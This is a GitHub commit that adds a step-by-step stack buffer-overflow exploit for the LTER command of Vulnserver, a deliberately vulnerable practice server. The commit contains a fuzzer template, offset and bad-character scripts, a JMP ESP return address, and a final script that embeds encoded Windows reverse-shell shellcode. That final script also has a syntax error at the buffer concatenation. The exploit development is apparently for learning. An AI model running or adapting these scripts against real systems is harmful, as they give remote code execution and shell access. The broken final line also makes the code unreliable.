Skip to content

Commit ce25174

Browse files
committed
Added LTER (EIP) exploit
1 parent 460ba79 commit ce25174

6 files changed

+207
-1
lines changed

LTER/0_spikeFuzzer.spk

+13
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
/////////////////////////////////////////////////////////////////////////////////////////
2+
// Title: Vulnserver LTER command fuzzing template for Spike
3+
// Author: Marco Lugo
4+
// Usage: generic_send_tcp 192.168.x.x 9999 0_spikeFuzzer.spk 0 0
5+
//
6+
// To get Stephen Bradshaw's Vulnserver, visit:
7+
// http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
8+
/////////////////////////////////////////////////////////////////////////////////////////
9+
10+
s_readline(); // Get line from server and print it
11+
s_string("LTER "); // Add "TRUN " to string
12+
s_string_variable("CONTENT"); // Add fuzzed string and send
13+
sleep(1); // Wait one second

LTER/1_getOffsetEIP.py

+33
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
#########################################################################################
2+
# Title: Vulnserver LTER command exploit
3+
# Author: Marco Lugo
4+
# Description: confirm that 2003 is the right offset to overwrite the EIP register
5+
# EIP is be overwritten by 4 42s (Bs), we own EIP.
6+
#
7+
# With a longer buffer (5200 bytes) a different overflow is triggered. A
8+
# SEH-based exploit could be used for that scenario that we will explore
9+
# at a different time.
10+
#
11+
# To get Stephen Bradshaw's Vulnserver, visit:
12+
# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
13+
#########################################################################################
14+
15+
import socket
16+
import sys
17+
import os
18+
19+
target_ip = sys.argv[1]
20+
buffer = 'LTER /.:/'
21+
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3503
22+
#pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em'
23+
# We got a hit at 2003
24+
pattern = '\x41'*2003 + '\x42'*4 + '\x43'*(3503-2003-4)
25+
buffer += pattern
26+
27+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
28+
sock.connect((target_ip, 9999))
29+
sock.recv(1024)
30+
sock.send(buffer)
31+
sock.close()
32+
33+

LTER/2_findBadchars.py

+51
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
#########################################################################################
2+
# Title: Vulnserver LTER command exploit
3+
# Author: Marco Lugo
4+
# Description: check for bad characters (everything from 0x01 to 0x7F goes through)
5+
#
6+
# To get Stephen Bradshaw's Vulnserver, visit:
7+
# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
8+
#########################################################################################
9+
10+
import socket
11+
import sys
12+
import os
13+
14+
badchars=(
15+
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
16+
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
17+
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
18+
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
19+
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
20+
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
21+
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
22+
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
23+
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
24+
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
25+
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
26+
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
27+
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
28+
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
29+
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
30+
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
31+
32+
badchars2 = (
33+
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
34+
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
35+
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
36+
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
37+
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
38+
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
39+
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
40+
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f")
41+
42+
target_ip = sys.argv[1]
43+
buffer = 'LTER /.:/'
44+
pattern = badchars2 + '\x41'*(2003-len(badchars2)) + '\x42'*4 + '\x43'*(3503-2003-4)
45+
buffer += pattern
46+
47+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
48+
sock.connect((target_ip, 9999))
49+
sock.recv(1024)
50+
sock.send(buffer)
51+
sock.close()

LTER/3_jumpToStack.py

+27
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
#########################################################################################
2+
# Title: Vulnserver LTER command exploit
3+
# Author: Marco Lugo
4+
# Description: find reliable way to jump to the stack.
5+
# A (bad-character-compliant) JMP ESP instruction is found in essfunc.dll at 0x62501203
6+
#
7+
# To get Stephen Bradshaw's Vulnserver, visit:
8+
# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
9+
#########################################################################################
10+
11+
import socket
12+
import sys
13+
import os
14+
import struct
15+
16+
jmp_esp = struct.pack('<I', 0x62501203)
17+
18+
target_ip = sys.argv[1]
19+
buffer = 'LTER /.:/'
20+
pattern = '\x41'*2003 + jmp_esp + '\x43'*(3503-2003-4)
21+
buffer += pattern
22+
23+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24+
sock.connect((target_ip, 9999))
25+
sock.recv(1024)
26+
sock.send(buffer)
27+
sock.close()

LTER/4_executePayload.py

+82
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,82 @@
1+
#########################################################################################
2+
# Title: Vulnserver LTER command exploit
3+
# Author: Marco Lugo
4+
# Description: execute payload
5+
#
6+
# To get Stephen Bradshaw's Vulnserver, visit:
7+
# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
8+
#########################################################################################
9+
10+
import socket
11+
import sys
12+
import os
13+
import struct
14+
15+
jmp_esp = struct.pack('<I', 0x62501203)
16+
# msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -e x86/alpha_mixed BufferRegister=ESP -f python
17+
buf = ""
18+
buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
19+
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
20+
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
21+
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
22+
buf += "\x79\x6c\x68\x68\x6f\x72\x63\x30\x33\x30\x37\x70\x65"
23+
buf += "\x30\x6c\x49\x79\x75\x45\x61\x49\x50\x72\x44\x6e\x6b"
24+
buf += "\x66\x30\x64\x70\x6e\x6b\x63\x62\x56\x6c\x6c\x4b\x43"
25+
buf += "\x62\x36\x74\x6c\x4b\x52\x52\x75\x78\x74\x4f\x6f\x47"
26+
buf += "\x52\x6a\x61\x36\x50\x31\x59\x6f\x4c\x6c\x45\x6c\x55"
27+
buf += "\x31\x73\x4c\x36\x62\x44\x6c\x47\x50\x6f\x31\x48\x4f"
28+
buf += "\x46\x6d\x56\x61\x69\x57\x58\x62\x78\x72\x71\x42\x46"
29+
buf += "\x37\x6e\x6b\x53\x62\x66\x70\x4e\x6b\x30\x4a\x75\x6c"
30+
buf += "\x4e\x6b\x62\x6c\x64\x51\x33\x48\x4b\x53\x43\x78\x75"
31+
buf += "\x51\x4a\x71\x46\x31\x4c\x4b\x36\x39\x57\x50\x33\x31"
32+
buf += "\x39\x43\x6c\x4b\x30\x49\x42\x38\x5a\x43\x47\x4a\x62"
33+
buf += "\x69\x6c\x4b\x50\x34\x6c\x4b\x76\x61\x78\x56\x35\x61"
34+
buf += "\x49\x6f\x6c\x6c\x6f\x31\x5a\x6f\x34\x4d\x46\x61\x7a"
35+
buf += "\x67\x45\x68\x4d\x30\x52\x55\x5a\x56\x34\x43\x33\x4d"
36+
buf += "\x79\x68\x57\x4b\x33\x4d\x67\x54\x73\x45\x7a\x44\x62"
37+
buf += "\x78\x6e\x6b\x42\x78\x54\x64\x65\x51\x4b\x63\x65\x36"
38+
buf += "\x6c\x4b\x44\x4c\x42\x6b\x4e\x6b\x50\x58\x57\x6c\x36"
39+
buf += "\x61\x38\x53\x4e\x6b\x75\x54\x4c\x4b\x36\x61\x38\x50"
40+
buf += "\x4f\x79\x57\x34\x75\x74\x47\x54\x33\x6b\x71\x4b\x73"
41+
buf += "\x51\x31\x49\x52\x7a\x52\x71\x59\x6f\x6b\x50\x43\x6f"
42+
buf += "\x63\x6f\x62\x7a\x6e\x6b\x54\x52\x5a\x4b\x4c\x4d\x51"
43+
buf += "\x4d\x32\x48\x35\x63\x55\x62\x73\x30\x53\x30\x52\x48"
44+
buf += "\x54\x37\x43\x43\x56\x52\x61\x4f\x53\x64\x31\x78\x50"
45+
buf += "\x4c\x74\x37\x75\x76\x73\x37\x69\x6f\x78\x55\x48\x38"
46+
buf += "\x6a\x30\x66\x61\x57\x70\x33\x30\x34\x69\x58\x44\x42"
47+
buf += "\x74\x36\x30\x43\x58\x76\x49\x4f\x70\x52\x4b\x55\x50"
48+
buf += "\x59\x6f\x4e\x35\x42\x70\x46\x30\x50\x50\x62\x70\x43"
49+
buf += "\x70\x50\x50\x37\x30\x70\x50\x35\x38\x6a\x4a\x64\x4f"
50+
buf += "\x39\x4f\x59\x70\x4b\x4f\x4e\x35\x6d\x47\x31\x7a\x74"
51+
buf += "\x45\x32\x48\x31\x6f\x37\x70\x67\x70\x35\x51\x42\x48"
52+
buf += "\x73\x32\x57\x70\x37\x61\x43\x6c\x6e\x69\x7a\x46\x51"
53+
buf += "\x7a\x76\x70\x73\x66\x43\x67\x71\x78\x4d\x49\x6f\x55"
54+
buf += "\x44\x34\x43\x51\x69\x6f\x4a\x75\x6e\x65\x4b\x70\x30"
55+
buf += "\x74\x46\x6c\x6b\x4f\x62\x6e\x54\x48\x42\x55\x68\x6c"
56+
buf += "\x65\x38\x5a\x50\x6e\x55\x59\x32\x33\x66\x59\x6f\x38"
57+
buf += "\x55\x35\x38\x65\x33\x52\x4d\x63\x54\x77\x70\x4b\x39"
58+
buf += "\x49\x73\x73\x67\x66\x37\x30\x57\x35\x61\x68\x76\x71"
59+
buf += "\x7a\x67\x62\x36\x39\x50\x56\x6a\x42\x49\x6d\x50\x66"
60+
buf += "\x68\x47\x57\x34\x56\x44\x75\x6c\x37\x71\x56\x61\x4c"
61+
buf += "\x4d\x53\x74\x34\x64\x64\x50\x49\x56\x63\x30\x61\x54"
62+
buf += "\x51\x44\x36\x30\x71\x46\x46\x36\x53\x66\x62\x66\x72"
63+
buf += "\x76\x72\x6e\x43\x66\x42\x76\x71\x43\x42\x76\x71\x78"
64+
buf += "\x53\x49\x7a\x6c\x37\x4f\x6b\x36\x59\x6f\x4a\x75\x4f"
65+
buf += "\x79\x4b\x50\x50\x4e\x71\x46\x72\x66\x69\x6f\x56\x50"
66+
buf += "\x71\x78\x64\x48\x6d\x57\x45\x4d\x31\x70\x49\x6f\x59"
67+
buf += "\x45\x6f\x4b\x58\x70\x38\x35\x59\x32\x62\x76\x70\x68"
68+
buf += "\x59\x36\x6e\x75\x6d\x6d\x6f\x6d\x39\x6f\x49\x45\x67"
69+
buf += "\x4c\x53\x36\x43\x4c\x75\x5a\x4d\x50\x49\x6b\x6b\x50"
70+
buf += "\x34\x35\x56\x65\x4f\x4b\x67\x37\x46\x73\x32\x52\x42"
71+
buf += "\x4f\x51\x7a\x55\x50\x71\x43\x69\x6f\x69\x45\x41\x41"
72+
73+
target_ip = sys.argv[1]
74+
buffer = 'LTER /.:/'
75+
pattern = '\x41'*2003 + jmp_esp + buf '\x43'*(3503-2003-4-len(buf))
76+
buffer += pattern
77+
78+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
79+
sock.connect((target_ip, 9999))
80+
sock.recv(1024)
81+
sock.send(buffer)
82+
sock.close()

TRUN/2_confirmOffsetEIP.py

+1-1
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22
# Title: Vulnserver TRUN command exploit
33
# Author: Marco Lugo
44
# Description: confirm that 2003 is the right offset to overwrite the EIP register
5-
# EIP is be overwritten by 4 42s (Bs)
5+
# EIP is overwritten by 4 42s (Bs)
66
#
77
# To get Stephen Bradshaw's Vulnserver, visit:
88
# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html

0 commit comments

Comments
 (0)